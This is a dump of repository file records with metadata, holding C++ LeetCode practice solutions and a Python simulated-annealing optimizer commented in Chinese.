Solution {\r\npublic:\r\n bool judgeCircle(string moves) {\r\n int row = 0, col = 0;\r\n for(int i = 0; i < moves.size(); i++){\r\n if(moves[i] == 'R') row++;\r\n else if(moves[i] == 'L') row--;\r\n else if(moves[i] == 'U') col++;\r\n else col--;\r\n }\r\n if(row == 0 && col == 0) return true;\r\n return false;\r\n }\r\n};" }, { "alpha_fraction": 0.3288690447807312, "alphanum_fraction": 0.3333333432674408, "avg_line_length": 24.39215660095215, "blob_id": "d533ac1d644d8329ed3ac5e5a26b650146c86736", "content_id": "ce0aea992e93d7cba1892090995bbff5ec7ad589", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1354, "license_type": "no_license", "max_line_length": 65, "num_lines": 51, "path": "/leetcode/leetcode20.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 20. 有效的括号\r\n\r\nclass Solution {\r\npublic:\r\n bool isValid(string s) {\r\n stack<char> stk;\r\n stk.push(s[0]);\r\n for(int i = 1;i < s.length();i++){\r\n if(!stk.empty() && check(stk.top(), s[i])) stk.pop();\r\n else stk.push(s[i]);\r\n }\r\n if(!stk.empty()) return true;\r\n else return false;\r\n\r\n }\r\n bool check(char a, char b){\r\n if(a == '(' && b ==')') return true;\r\n else if(a == '[' && b == ']') return true;\r\n else if(a == '{' && b == '}') return true;\r\n else return false;\r\n }\r\n};\r\n\r\n// class Solution {\r\n// public:\r\n// bool isValid(string s) {\r\n// if(s.size()==0)return true;\r\n// stack<char>s_;\r\n// int i=0;\r\n// while(s[i]){\r\n// if(!s_.empty()){\r\n// char a=s_.top();\r\n// if(s[i]==')'&&a=='(')\r\n// s_.pop();\r\n// else if(s[i]=='}'&&a=='{')\r\n// s_.pop();\r\n// else if(s[i]==']'&&a=='[')\r\n// s_.pop();\r\n// else\r\n// s_.push(s[i]);\r\n// }\r\n// else\r\n// s_.push(s[i]);\r\n// i++;\r\n// }\r\n// return s_.empty();\r\n// }\r\n// };" }, { "alpha_fraction": 0.46123260259628296, "alphanum_fraction": 0.47514909505844116, "avg_line_length": 22.047618865966797, "blob_id": "4041327d8f81301d6cc0491627a97cab5613b93d", "content_id": "3efe70b6d34a0034870204ce0bb3efe0eee0a095", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 521, "license_type": "no_license", "max_line_length": 58, "num_lines": 21, "path": "/leetcode/leetcode686.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 686. 重复叠加字符串匹配\r\n\r\nclass Solution {\r\npublic:\r\n int repeatedStringMatch(string a, string b) {\r\n if(a.empty() || b.empty()) return -1;\r\n int res = 1;\r\n string temp = a;\r\n int aSize = a.size(), bSize = b.size();\r\n while (temp.find(b) == string::npos)\r\n {\r\n if(temp.size() > aSize * 2 + bSize) return -1;\r\n temp += a;\r\n res++;\r\n }\r\n return res;\r\n }\r\n};" }, { "alpha_fraction": 0.4554242789745331, "alphanum_fraction": 0.47878625988960266, "avg_line_length": 27.72800064086914, "blob_id": "1e9b3c712a7432dd270e0a0940fafbda2ce8d903", "content_id": "73b3b84d04c6276f45d01bbb506e6271a0b0aeb0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4046, "license_type": "no_license", "max_line_length": 101, "num_lines": 125, "path": "/python/SA.py", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "import numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# 计算函数 f(x,y) = 5cos(xy) + xy + y^3 的最小值\r\n# x ∈ [ -5, 5 ] y ∈ [-5,5 ]\r\nclass Particle:\r\n def __init__(self, res):\r\n self.res = res\r\n self.score = -1\r\n\r\n\r\nclass SA:\r\n def __init__(self, scoreFunc):\r\n # 评分函数\r\n self.scoreFunc = scoreFunc\r\n # 退火速率\r\n self.lamda = 0.9\r\n # 初始温度\r\n self.T = 1000\r\n # 终止条件\r\n self.Tmin = 1\r\n # 解集\r\n self.Solutions = []\r\n # 解数量\r\n self.solutionNums = 20\r\n # 最优解\r\n self.Optimal = None\r\n # 局部最优解\r\n self.localOptimal = None\r\n # 每个 T的迭代次数\r\n self.iterTimes = 100\r\n # 系数 K\r\n self.K = 1\r\n\r\n self.initialize()\r\n\r\n # 初始化\r\n def initialize(self):\r\n self.Solutions = []\r\n self.T = 1000\r\n # 根据变量范围生成初始解\r\n for i in range(self.solutionNums):\r\n res = [np.random.uniform(-5, 5), np.random.uniform(-5, 5)]\r\n particle = Particle(res)\r\n self.Solutions.append(particle)\r\n\r\n # 评价解集\r\n def score(self):\r\n self.localOptimal = self.Solutions[0]\r\n for particle in self.Solutions:\r\n # 1. 计算能量\r\n particle.score = self.scoreFunc(particle)\r\n # 2. 更新全局最优解\r\n if particle.score > self.Optimal.score:\r\n self.Optimal = particle\r\n # 3. 更新局部最优解\r\n if particle.score > self.localOptimal.score:\r\n self.localOptimal = particle\r\n\r\n # 交换概率\r\n def Probability(self, p_old, p_new):\r\n if p_new.score > p_old.score:\r\n return 1\r\n else:\r\n return np.exp((p_old.score - p_new.score) / (self.K * self.T))\r\n\r\n # 在当前解附近搜索新解\r\n def search(self, p):\r\n x = sorted([-5, 5, p.res[0] + np.random.uniform(-1, 1)])[1]\r\n y = sorted([-5, 5, p.res[1] + np.random.uniform(-1, 1)])[1]\r\n p_new = Particle([x, y])\r\n return p_new\r\n\r\n # 迭代过程\r\n def iteration(self):\r\n n = 0\r\n while n <= self.iterTimes:\r\n # 1. 计算解集评分\r\n self.score()\r\n # 2. 扰动解集\r\n for i in range(self.solutionNums):\r\n p = self.Solutions[i]\r\n p_new = self.search(p)\r\n # 3. 依概率更新解集\r\n if (np.random.random() < self.Probability(p, p_new)):\r\n self.Solutions[i] = p_new\r\n n += 1\r\n\r\n # 降温\r\n def cooling(self):\r\n # 初始化\r\n g_scores, l_scores = [], []\r\n self.Optimal = self.Solutions[0]\r\n # 1. 判断终止条件\r\n while self.T > self.Tmin:\r\n # 2. 该温度下迭代\r\n self.iteration()\r\n # 3. 记录当前温度下的局部最优解\r\n print(f'{round(self.T, 5)}:{-round(self.localOptimal.score, 5)}:{self.localOptimal.res}')\r\n g_scores.append(-round(self.Optimal.score, 4))\r\n l_scores.append(-round(self.localOptimal.score, 4))\r\n # 4. 降温\r\n self.T *= self.lamda\r\n print(f\"最优解:{self.Optimal.res}:{-round(self.Optimal.score, 4)}\")\r\n self.display(g_scores, l_scores)\r\n\r\n # 结果可视化\r\n def display(self, res1, res2):\r\n fig, ax = plt.subplots(1, 2, figsize=(10, 4))\r\n ax[0].plot(res1, color='lightcoral')\r\n ax[0].set_title(\"Global Optimal\", color='r')\r\n ax[0].set_xlabel(\"iteration\")\r\n ax[0].set_ylabel(\"score\")\r\n\r\n ax[1].plot(res2, color='#4b5cc4')\r\n ax[1].set_title(\"Local Optimal\", color='r')\r\n ax[1].set_xlabel(\"iteration\")\r\n ax[1].set_ylabel(\"score\")\r\n plt.show()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n sa = SA(lambda p: -(5 * np.cos(p.res[0] * p.res[1]) + p.res[0] * p.res[1] + pow(p.res[1], 3)))\r\n sa.cooling()\r\n\r\n \r\n" }, { "alpha_fraction": 0.38923075795173645, "alphanum_fraction": 0.41846153140068054, "avg_line_length": 20.482759475708008, "blob_id": "f214009015b61657dbc92dd80552339b61455a40", "content_id": "a4db3ca5978961b95defd92eb7192499804b4d4d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 658, "license_type": "no_license", "max_line_length": 60, "num_lines": 29, "path": "/leetcode/leetcode7.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 7.整数翻转\r\n\r\nclass Solution {\r\npublic:\r\n int reverse(int x){\r\n queue<int> que;\r\n int temp,count=0;\r\n long long result=0;\r\n bool flag = false;\r\n if(x<0){flag = true;}\r\n while (x != 0){\r\n temp = x%10;\r\n que.push(temp);\r\n x = x/10;\r\n count++;\r\n }\r\n while (!que.empty()){\r\n result = result + que.front()*(pow(10,--count));\r\n que.pop();\r\n }\r\n if(result>=pow(2,31)-1 || result<=-pow(2,31)){\r\n return 0;\r\n }\r\n return result;\r\n }\r\n};" }, { "alpha_fraction": 0.4656991958618164, "alphanum_fraction": 0.48218998312950134, "avg_line_length": 24.172412872314453, "blob_id": "bd17e0fdab18c0ae792735721511dabfc06a524d", "content_id": "db20962785e06daa1e4aae3de1032df30a05ef22", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2118, "license_type": "no_license", "max_line_length": 61, "num_lines": 58, "path": "/leetcode/leetcode3.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 3.无重复最长子串\r\n\r\n// Solution 1\r\n// 从第一位扫描,每次将未出现过的字符保存进 map\r\n// 当发现重复字符,更新最大长度,从该重复字符第一次出现的位置的下一位开始扫描\r\n// 这么写结果的 时间复杂度、空间复杂度都很高\r\nclass Solution {\r\npublic:\r\n int lengthOfLongestSubstring(string s) {\r\n if (s == \"\") return 0;\r\n map<char,int> mp; // 字符、索引\r\n int res = 0, MAX_Length = 0, i = 0;\r\n int length = s.size();\r\n while (i < length) {\r\n map<char,int>:: iterator iter = mp.find(s[i]);\r\n if (iter != mp.end()) { // 出现重复字符\r\n i = iter->second + 1;\r\n mp.clear();\r\n MAX_Length = max(res, MAX_Length);\r\n res = 0;\r\n } else {\r\n mp[s[i]] = i;\r\n res += 1;\r\n i++;\r\n }\r\n }\r\n return max(res, MAX_Length);\r\n }\r\n};\r\n\r\n// Solution 2\r\n// 采用滑动窗口\r\n/* \r\n s:输入的字符串\r\n i:最长子字符串的起点数组下标\r\n j:最长子字符串的终点数组下标\r\n ans:最长子字符串长度\r\n str[]:下标(序号)表示 \"字符\",储存的值表示该字符位置+1\r\n*/\r\nint lengthOfLongestSubstring(string s) {\r\n vector<int> str(128,0); // 初始将所有值都设为0\r\n int i = 0, ans = 0;\r\n for (int j = 0;j < s.size();j++) // 在整个字符串长度之内\r\n {\r\n /* \r\n 1.如果当前字符在之前没出现过,那么其值肯定是0,不会改变当前扫描起点\r\n 2.如果s[j]出现过,则其值一定大于0:如果起点i小于str[s[j]],说明重复的字符在当前的子串内,\r\n 此时应该切换扫描起点至s[j]上一次出现位置的下一位(str[s[j]]储存的值),重新扫描\r\n */\r\n i = max(i, str[s[j]]); \r\n str[s[j]] = j + 1; // 当前字符的坐标更新\r\n ans = max(ans, j-i+1); // 比较哪个距离更大\r\n }\r\n return ans;\r\n}" }, { "alpha_fraction": 0.43491125106811523, "alphanum_fraction": 0.4467455744743347, "avg_line_length": 18, "blob_id": "5ade1709c7ca452379d5087453161af8690399e2", "content_id": "ae4da83242f6cae056c7528cc245c6522a9d012b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 346, "license_type": "no_license", "max_line_length": 51, "num_lines": 17, "path": "/leetcode/leetcode27.cpp", "repo_name": "MoMiJ1/Fungus", "src_encoding": "UTF-8", "text": "#include<bits/stdc++.h>\r\nusing namespace std;\r\n\r\n// LeetCode 27.移出元素\r\n\r\nclass Solution {\r\npublic:\r\n int removeElement(vector<int>& nums, int val) {\r\n int k = 0;\r\n for(int i = 0;i<nums.size();i++){\r\n if(nums[i]!=val){\r\n nums[k++] = nums[i];\r\n }\r\n }\r\n return k;\r\n }\r\n};" } ]
36
abhishek11cse134/djangorestcrud
https://github.com/abhishek11cse134/djangorestcrud
6a5cadeb5ca90f634daeeef07945bd6d169629b6
c69ce5d0d2eb878ba4b28e6e5f154d1dc9dcb297
fe0e292ee5d2e9f47ecaa8eb42f0f7081b3f3a0d
refs/heads/master
2020-06-29T08:36:02.913498
2019-03-05T12:12:27
2019-03-05T12:12:27
200,488,376
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7744107842445374, "alphanum_fraction": 0.7744107842445374, "avg_line_length": 26.090909957885742, "blob_id": "438a7d21e5ad28af1b84304c9ef37b379032540c", "content_id": "ef6cd0d538eb767a0fc123a909af8857f771ad76", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 297, "license_type": "no_license", "max_line_length": 67, "num_lines": 11, "path": "/Apidev/views.py", "repo_name": "abhishek11cse134/djangorestcrud", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\n\n# Create your views here.\nfrom django.http import HttpResponse\nfrom django.views.generic import TemplateView\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. You're at the polls index.\")\nclass Homeview(TemplateView):\n template_name = \"home.html\"" } ]
1
Chace0219/RPI-Teensy-Weather-Monitor
https://github.com/Chace0219/RPI-Teensy-Weather-Monitor
099b982b2c9b28370d40ac4db7c3897b473a5914
8a1f5d98f46164b6eb9145db6a9e656e68ff0e3f
897208c562dfb8cb20e8cfa7bd6bbc06eef49acd
refs/heads/master
2020-03-08T16:36:12.309575
2018-04-06T21:33:19
2018-04-06T21:33:19
128,243,949
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.622558057308197, "alphanum_fraction": 0.6642093658447266, "avg_line_length": 23.889907836914062, "blob_id": "074d31d8b3d4c7d6cb1266cbe3b4ff86cfe7bb9b", "content_id": "5897e4ce8ade8aaa064f1fad95984754b471fce5", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2713, "license_type": "no_license", "max_line_length": 83, "num_lines": 109, "path": "/TeensySide.ino", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "// Screen Pins\n#define sclk 13\n#define mosi 11\n#define dc 9\n#define cs 10\n#define rst 8\n\n// Color definitions\n#define\tBLACK 0x0000\n#define\tBLUE 0x001F\n#define\tRED 0xF800\n#define\tGREEN 0x07E0\n#define CYAN 0x07FF\n#define MAGENTA 0xF81F\n#define YELLOW 0xFFE0 \n#define WHITE 0xFFFF\n\n//#include <Lighting.h>\n#include <avr/io.h>\n#include <avr/interrupt.h>\n#include <Adafruit_GFX.h>\n#include <Adafruit_SSD1351.h>\n#include <Adafruit_PWMServoDriver.h>\n#include <SPI.h>\n#include <Wire.h>\n#include <Stepper.h>\n#include <Lightning.h>\n#include <RainMaker.h>\n#include <WeatherCloud.h>\n\n\n//Screen library for Teensy screen\nAdafruit_SSD1351 tft = Adafruit_SSD1351(cs, dc, mosi, sclk, rst); \n\n//Start STEPPER CLOUD\nvoid CloudComplete();\nWeatherCloud weatherCloud(3, 4, 5, 6, &CloudComplete);\n\nvoid CloudComplete() {\n Serial.println(\"Cloud DONE\");\n}\n\n//Interrupt for cloud stepper motor top bounds\nvoid pin_ISR() {\n weatherCloud.HandleInterrupt();\n Serial.println(\"Interrupt complete\");\n} \n\nvoid setup() {\n Serial.begin(9600);\n\n Serial.println(\"Start cloud setup\");\n \n attachInterrupt(digitalPinToInterrupt(2), pin_ISR, CHANGE);\n \n weatherCloud.setSpeed(1600);\n weatherCloud.Initialise();\n Serial.println(\"End cloud initialise home\");\n weatherCloud.stepperStatus = FORWARD;\n\n Serial.println(weatherCloud.stepperStatus);\n Serial.println(\"End cloud setup\");\n \n Serial.print(\"hello!\");\n tft.begin();\n}\n\nvoid loop() {\n Serial.println(\"Updating Cloud\");\n weatherCloud.Update();\n \n// // Drive each servo one at a time\n// Serial.println(servonum);\n// for (uint16_t pulselen = SERVOMIN; pulselen < SERVOMAX; pulselen++) {\n// pwm.setPWM(servonum, 0, pulselen);\n// }\n//\n// //delay(500);\n// for (uint16_t pulselen = SERVOMAX; pulselen > SERVOMIN; pulselen--) {\n// pwm.setPWM(servonum, 0, pulselen);\n// }\n//\n// //delay(500);\n//\n// servonum ++;\n// if (servonum > 7) servonum = 0;\n}\n\n//// you can use this function if you'd like to set the pulse length in seconds\n//// e.g. setServoPulse(0, 0.001) is a ~1 millisecond pulse width. its not precise!\n//void setServoPulse(uint8_t n, double pulse) {\n// double pulselength;\n// \n// pulselength = 1000000; // 1,000,000 us per second\n// pulselength /= 60; // 60 Hz\n// Serial.print(pulselength); Serial.println(\" us per period\"); \n// pulselength /= 4096; // 12 bits of resolution\n// Serial.print(pulselength); Serial.println(\" us per bit\"); \n// pulse *= 1000;\n// pulse /= pulselength;\n// Serial.println(pulse);\n// pwm.setPWM(n, 0, pulse);\n//}\n\nvoid testdrawtext(char *text, uint16_t color) {\n tft.setCursor(0,0);\n tft.setTextColor(color);\n tft.print(text);\n}\n" }, { "alpha_fraction": 0.7051831483840942, "alphanum_fraction": 0.7310987114906311, "avg_line_length": 28.541139602661133, "blob_id": "b28ac1b38ded8c0a483f8e2b54f92c328f010bf3", "content_id": "78faeb8f9d8f19f7d4460211b464c3d5d3cad253", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9338, "license_type": "no_license", "max_line_length": 117, "num_lines": 316, "path": "/Mqtt2Arduino.py", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "\n### Logging function package in order to display AWS Connection and callback messages\nimport sys\nimport logging\n\n### Time package, used to implement thread and timing in RPI\nimport time\n\n### JSON Processing Python package\nimport json\n\n### URL Processing Package, used to download images from URL provided in JSON via MQTT for user photos \nimport urllib\nimport urllib2\nimport datetime\n\nfrom PyCRC.CRC32 import CRC32\n\n'''\nInstall from pip\npip install AWSIoTPythonSDK\n\nDownload and Build from source in Git Hub\n\ngit clone https://github.com/aws/aws-iot-device-sdk-python.git\ncd aws-iot-device-sdk-python\nsudo python setup.py install\n'''\nfrom AWSIoTPythonSDK.MQTTLib import AWSIoTMQTTClient ## AWS IOt MQTT Client Library \n\n### SPI and GPIO package for Raspberry PI Python\n'''\nsudo apt-get update\nsudo apt-get install build-essential python-pip python-dev python-smbus git\ngit clone https://github.com/adafruit/Adafruit_Python_GPIO.git\ncd Adafruit_Python_GPIO\nsudo python setup.py install\n'''\nimport Adafruit_GPIO.SPI as SPI\n\n#SSD1351 driver port from original adafruit driver using Python. It is based on the SPI interface.\n'''\ngit clone https://github.com/twchad/Adafruit_Python_SSD1351.git\ncd Adafruit_Python_SSD1351\nsudo python setup.py install\n'''\nimport Adafruit_SSD1351\n\n# Image Library used for photos on screen\nimport Image\n\n\n'''\n\ttar -xzf crc16-0.1.1.tar.gz\n\tcd crc16-0.1.1\n\tpython setup.py build\n\tsudo python setup.py install\n'''\nimport crc16\n\n# this is for UART for Raspberry Pi\nimport serial # Referenced from https://pypi.python.org/pypi/pyserial/2.7 \n\nimport threading, time\n\nfrom json import load\nfrom urllib2 import urlopen\n\n'''\n\tFunction for getting public ip of current RPI\n'''\ndef GetPublicIPAddr():\n\tmy_ip = load(urlopen('http://jsonip.com'))['ip']\n\treturn my_ip\n\nWunderAPIKey = \"973c64631b35d69e\"\n\ndef GetWeatherInfo():\n\tAPIRequest = \"http://api.wunderground.com/api/\"\n\tAPIRequest += WunderAPIKey\n\tAPIRequest += \"/geolookup/conditions/astronomy/q/autoip.json?geo_ip=\"\n\tAPIRequest += GetPublicIPAddr()\n\t\n\tprint APIRequest\n\n\tf = urllib2.urlopen(APIRequest)\n\tjson_string = f.read()\n\tparsed_json = json.loads(json_string)\n\tlocation = parsed_json['location']['city']\n\ttemp_c = parsed_json['current_observation']['temp_c']\n\tweather_des = parsed_json['current_observation']['weather']\n\tprecip_today_metric = parsed_json['current_observation']['precip_today_metric']\n\tprint \"precip_today_metric %s\" % (precip_today_metric)\n\tprint \"Current temperature in %s is: %s celcius degree and %s.\" % (location, temp_c, weather_des)\n\t\n\tcurrtime = parsed_json['moon_phase']['current_time']['hour'] + \":\"\n\tcurrtime += parsed_json['moon_phase']['current_time']['minute']\n\tcurrtime += \":00\"\n\tprint \"Current time %s\" % (currtime)\n\t\n\tsunrise = parsed_json['moon_phase']['sunrise']['hour'] + \":\"\n\tsunrise += parsed_json['moon_phase']['sunrise']['minute']\n\tsunrise += \":00\"\n\tprint \"sunrise time %s\" % (sunrise)\n\n\tsunset = parsed_json['moon_phase']['sunset']['hour'] + \":\"\n\tsunset += parsed_json['moon_phase']['sunset']['minute']\n\tsunset += \":00\"\n\tprint \"sunset time %s\" % (sunset)\n\n\tmoonrise = parsed_json['moon_phase']['moonrise']['hour'] + \":\"\n\tmoonrise += parsed_json['moon_phase']['moonrise']['minute']\n\tmoonrise += \":00\"\n\tprint \"moonrise time %s\" % (moonrise)\n\n\tmoonset = parsed_json['moon_phase']['moonset']['hour'] + \":\"\n\tmoonset += parsed_json['moon_phase']['moonset']['minute']\n\tmoonset += \":00\"\n\tprint \"moonset time %s\" % (moonset)\n\n\tMyDateTime = datetime.datetime.now()\n\t#print datetime.datetime.now()\n\n\tdate = MyDateTime.strftime(\"%d/%m/%y\")\n\tprint \"current date time %s\" % (date)\n\n\tdata = {\"weatherinfo\" : {}}\n\tdata['weatherinfo']['temp_c'] = temp_c\n\tdata['weatherinfo']['date'] = date\n\tdata['weatherinfo']['weather'] = weather_des\n\tdata['weatherinfo']['precipitation'] = precip_today_metric\n\tdata['weatherinfo']['currtime'] = currtime\n\tdata['weatherinfo']['sunrise'] = sunrise\n\tdata['weatherinfo']['sunset'] = sunset\n\tdata['weatherinfo']['moonrise'] = moonrise\n\tdata['weatherinfo']['moonset'] = moonset\n\tjson_data = json.dumps(data)\n\tprint json_data\n\tf.close()\t\n\n\tUARTWrite(json_data)\n\n# Raspberry Pi pin configuration for SSD1351:\nRST0 = 5\nRST1 = 6\n# Note the following are only used with SPI:\nDC0 = 24\nDC1 = 23\n\n# SPI Port definition. \nSPI_PORT = 0\nSPI_DEVICE0 = 0\nSPI_DEVICE1 = 1\n\n# 128x96 display instance with hardware SPI:\nLCD0 = Adafruit_SSD1351.SSD1351_128_96(rst=RST0, dc=DC0, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE0, max_speed_hz=8000000))\nLCD1 = Adafruit_SSD1351.SSD1351_128_96(rst=RST1, dc=DC1, spi=SPI.SpiDev(SPI_PORT, SPI_DEVICE1, max_speed_hz=8000000))\n\n# Initialize library.\nLCD0.begin()\nLCD1.begin()\n\n# Clear display.\nLCD0.clear()\nLCD1.clear()\n\n## CRC16 temp variable for CRC16 CCIT \ncrc = bytearray([0, 0, 0, 0]) \n\n### UART Write function\ndef UARTWrite(data):\n\t# Serial Port open, this is different than in RPI 2 or other RPI devices.\n\t# There is an issue with the pi3 revision b\n\tserialport = serial.Serial(\"/dev/ttyS0\", 115200, timeout=0.5) # Baudrate 9600, Timeout 0.5sec\n\t# Byte Array\n\tbuff = []\n\t# get bytes from JSON data which are then sent to teensy.\n\tbuff = data.encode()\n\t#print CRC32().calculate(buff)\n\tnCRC32 = CRC32().calculate(buff)\n\tprint hex(nCRC32)\n\t\n\t# Set CRC16 variable \n\tcrc[3] = nCRC32 & 0xFF # get low byte from CRC16\n\t# get high byte from CRC16\n\tnCRC32 >>= 8\n\tcrc[2] = nCRC32 & 0xFF\n\tnCRC32 >>= 8\n\tcrc[1] = nCRC32 & 0xFF\n\tnCRC32 >>= 8\n\tcrc[0] = nCRC32 & 0xFF \n\t# Send main message\n\tprint serialport.write(buff) \n\t# Send CRC16 buffer\n\tprint serialport.write(crc) \n\n\t# Close Serial Port, so that other routines can use serial instance \n\tserialport.close()\n\ttime.sleep(0.25)\n\n# Custom MQTT message callback, if any message is arrived PI, program will call the customCallback.\ndef customCallback(client, userdata, message):\n\t# topic is in message.topic, message is in message.payload.\n\tprint(\"Received a new message: \")\n\tprint(message.payload)\n\tprint(\"from topic: \")\n\tprint(message.topic)\n\tprint(\"--------------\\n\\n\")\n\t\n\t# create a JSON Object\n\tParsingObj = json.loads(message.payload)\n\n\t### parse JSON\n\tprint ParsingObj[\"person\"][\"imageUrl\"]\n\timgurl = ParsingObj[\"person\"][\"imageUrl\"]\n\tuserID = ParsingObj[\"person\"][\"userID\"]\n\tlocationID = ParsingObj[\"person\"][\"locationID\"]\n\tuserName = ParsingObj[\"person\"][\"userName\"]\n\n\t# Create image path for Image download on PI\n\tScreenImgPath = \"Screenimage\" + str(userID)\n\tScreenImgPath = ScreenImgPath + \".jpg\"\n\n\t# \n\ttry: \n\t\t# Open URL, if the url doesn't exist, trace exception\n\t\timgdata = urllib2.urlopen(imgurl)\n\t\t# If there is no error get the image\n\t\turllib.urlretrieve(imgurl, ScreenImgPath)\n\texcept urllib2.HTTPError, e:\n\t\tprint e.code\n\t\treturn\n\texcept urllib2.URLError, e:\n\t\tprint e.args\n\t\treturn\n\n\t#Open image using stock using image library \n\timage = Image.open(ScreenImgPath).resize((128, 96), Image.ANTIALIAS)\n\n\tif userID == 1:# First display module\n\t\tLCD0.roughimage(image)\n\telif userID == 2: # Second display module\n\t\tLCD1.roughimage(image)\n\t\n\t# Write Packet mqtt message content\n\tUARTWrite(message.payload)\n\t\t\n\ninterval = 1\ncycle = 0\nTimeout = 10 # 10 sec\n\ndef GetWeatherthreadProc(e):\n\tprint('Weather thread proc is started!')\n\tcycle = 0\n\tGetWeatherInfo()\n\twhile not e.isSet():\n\t\tevent_is_set = e.wait(interval)\n\t\tcycle = cycle + 1\n\t\tif cycle > Timeout:\n\t\t\tcycle = 0\n\t\t\tGetWeatherInfo()\n\n\n# Start up routine.\n# parameters for AWS Mqtt, mainly tested using Mqtt.FX software\nhost = \"a1idvfzc1etc2l.iot.us-west-2.amazonaws.com\" # endpoint for AWS IOT thing\n\n# Root ceritficate Path\nrootCAPath = \"root-CA.crt\"\ncertificatePath = \"HouseyTest.cert.pem\"\nprivateKeyPath = \"HouseyTest.private.key\"\n\n\n# Configure logging, only for analysing the log of Mqtt client\n# (I probably don't need this for now because I've been using MQTT.fx for testing)\nlogger = logging.getLogger(\"AWSIoTPythonSDK.core\")\nlogger.setLevel(logging.DEBUG)\nstreamHandler = logging.StreamHandler()\nformatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nstreamHandler.setFormatter(formatter)\nlogger.addHandler(streamHandler)\n\n# Init AWSIoTMQTTClient\nmyAWSIoTMQTTClient = AWSIoTMQTTClient(\"basicPubSub\") # Client name \n# Configure with certificate setting\nmyAWSIoTMQTTClient.configureEndpoint(host, 8883)\nmyAWSIoTMQTTClient.configureCredentials(rootCAPath, privateKeyPath, certificatePath)\n\n# AWSIoTMQTTClient connection configuration\nmyAWSIoTMQTTClient.configureAutoReconnectBackoffTime(1, 32, 20)\nmyAWSIoTMQTTClient.configureOfflinePublishQueueing(-1) # Infinite offline Publish queueing\nmyAWSIoTMQTTClient.configureDrainingFrequency(2) # Draining: 2 Hz\nmyAWSIoTMQTTClient.configureConnectDisconnectTimeout(10) # 10 sec\nmyAWSIoTMQTTClient.configureMQTTOperationTimeout(5) # 5 sec\n\n# Connect and subscribe to AWS IoT\nmyAWSIoTMQTTClient.connect() # Mqtt Client connect \n\n # set subscribe topic \nmyAWSIoTMQTTClient.subscribe(\"Home/WeatherRPI/Input1\", 1, customCallback)\nmyAWSIoTMQTTClient.subscribe(\"Home/WeatherRPI/Input2\", 1, customCallback)\n\ntime.sleep(2)\n\n# Publish to the output topic in a loop forever\nmyAWSIoTMQTTClient.publish(\"Home/WeatherRPI/Output\", \"Rapsberry Pi Weather Station is Ready!\", 0)\n\nmyevent = threading.Event()\nCurrentThread = threading.Thread(target=GetWeatherthreadProc, args=(myevent,))\nCurrentThread.start()\n\ntry:\n\twhile True:\n\t\ttime.sleep(2)\nexcept KeyboardInterrupt: # If CTRL+C is pressed, exit cleanly:\n myevent.set()\n\n\n" }, { "alpha_fraction": 0.7515528202056885, "alphanum_fraction": 0.7805383205413818, "avg_line_length": 29.1875, "blob_id": "2a8f3d6a223323adb314713334daa2c0aea4def1", "content_id": "0ed219043576220fba8e209e9b1d5507116ca32d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 483, "license_type": "no_license", "max_line_length": 108, "num_lines": 16, "path": "/README.md", "repo_name": "Chace0219/RPI-Teensy-Weather-Monitor", "src_encoding": "UTF-8", "text": "# RPI-Teensy-Weather-Monitor\nRPI &amp; Teensy 3.6 based Weather Monitor Device \n\n# Wiring\n![wiring diagram](https://github.com/Chace0219/RPI-Teensy-Weather-Monitor/blob/master/Wiring_Schematics.png)\n\n\n# Fucntinoalitiy List\n1) RPI Side\n- WUnderground Weather API Client using internet IP\n- AWS IOT client\n- UART CRC32 Master for Arduino ( weather info and position information)\n\n2) Arduino Side\n- wehather symbols using stepper motor, ws2812, small water pump\n- Serial slave from RPI\n" } ]
3
seepls/algorithmic-trading
https://github.com/seepls/algorithmic-trading
ad40c7cf5476f1c6b616a5826c83f9c9e401ee83
fec2731ba1c86bd1a88125c50ef8596135cf413a
82020a1f1bd9730489a3fd0d8cd6a452f26b30b8
refs/heads/master
2020-08-18T10:27:52.130206
2019-10-17T12:08:33
2019-10-17T12:08:33
215,779,451
1
0
null
2019-10-17T11:48:38
2019-10-16T14:14:48
2014-05-09T04:01:56
null
